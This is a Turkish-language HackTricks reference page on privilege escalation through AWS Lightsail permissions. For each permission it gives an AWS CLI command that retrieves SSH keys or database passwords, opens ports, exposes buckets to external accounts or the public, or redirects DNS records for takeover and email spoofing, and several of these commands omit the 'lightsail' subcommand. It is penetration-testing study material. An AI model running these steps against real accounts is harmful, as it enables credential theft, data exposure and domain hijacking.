AWS - Lightsail Privesc

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Lightsail

Lightsail hakkında daha fazla bilgi için kontrol edin:

AWS - Lightsail Enum

Lightsail'in kullanıcıya ait IAM rollerini kullanmadığını ancak AWS yönetilen bir hesaba ait olduğunu belirtmek önemlidir, bu nedenle bu hizmeti privesc için kötüye kullanamazsınız. Ancak, kod, API anahtarları ve veritabanı bilgileri gibi hassas veriler bu hizmette bulunabilir.

`lightsail:DownloadDefaultKeyPair`

Bu izin, örneklere erişmek için SSH anahtarlarını almanıza olanak tanır:

aws lightsail download-default-key-pair

Olası Etki: Örneklerin içinde hassas bilgileri bulma.

`lightsail:GetInstanceAccessDetails`

Bu izin, örneklere erişmek için SSH anahtarları oluşturmanıza olanak tanır:

aws lightsail get-instance-access-details --instance-name <instance_name>

Olası Etki: Örneklerin içinde hassas bilgileri bulmak.

`lightsail:CreateBucketAccessKey`

Bu izin, size kovaya erişim anahtarı almanıza olanak tanır:

aws lightsail create-bucket-access-key --bucket-name <name>

Olası Etki: Kova içinde hassas bilgileri bulmak.

`lightsail:GetRelationalDatabaseMasterUserPassword`

Bu izin, veritabanına erişim için kimlik bilgilerini almanıza olanak tanır:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Olası Etki: Veritabanında hassas bilgileri bulmak.

`lightsail:UpdateRelationalDatabase`

Bu izin, veritabanına erişim için şifreyi değiştirmenize olanak tanır:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

Eğer veritabanı kamuya açık değilse, bu izinlerle kamuya açık hale getirebilirsiniz

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Potansiyel Etki: Veritabanında hassas bilgileri bulma.

`lightsail:OpenInstancePublicPorts`

Bu izin, portları İnternete açmaya olanak tanır.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Olası Etki: Hassas portlara erişim.

`lightsail:PutInstancePublicPorts`

Bu izin, portları İnternete açmaya olanak tanır. Bu çağrının, belirtilmeyen herhangi bir açılan portu kapatacağını unutmayın.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Olası Etki: Hassas portlara erişim.

`lightsail:SetResourceAccessForBucket`

Bu izin, bir örneğe ek kimlik bilgisi olmadan bir kovaya erişim verme imkanı tanır.

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Potansiyel Etki: Hassas bilgilere sahip bucket'lara potansiyel yeni erişim.

`lightsail:UpdateBucket`

Bu izinle bir saldırgan, kendi AWS hesabına bucket'lar üzerinde okuma erişimi verebilir veya bucket'ları herkes için halka açık hale getirebilir:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Potansiyel Etki: Hassas bilgilere sahip bucket'lara potansiyel yeni erişim.

`lightsail:UpdateContainerService`

Bu izinlerle bir saldırgan, konteyner hizmetinden özel ECR'lere erişim verebilir.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Olası Etki: Özel ECR'den hassas bilgiler elde etme

`lightsail:CreateDomainEntry`

Bu izne sahip bir saldırgan, alt alan adı oluşturabilir ve bunu kendi IP adresine yönlendirebilir (alt alan adı ele geçirme), ya da alan adından e-postaları sahtelemek için bir SPF kaydı oluşturabilir, hatta ana alan adını kendi IP adresine ayarlayabilir.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Olası Etki: Bir alan adını ele geçirmek

`lightsail:UpdateDomainEntry`

Bu izne sahip bir saldırgan, alt alan adı oluşturabilir ve bunu kendi IP adresine yönlendirebilir (alt alan adı ele geçirme), ya da alan adından e-posta sahteciliği yapmasına izin veren bir SPF kaydı oluşturabilir, hatta ana alan adını kendi IP adresine ayarlayabilir.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potansiyel Etki: Bir alanın ele geçirilmesi

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousAWS - Lambda Privesc NextAWS - Mediapackage Privesc

Last updated 3 days ago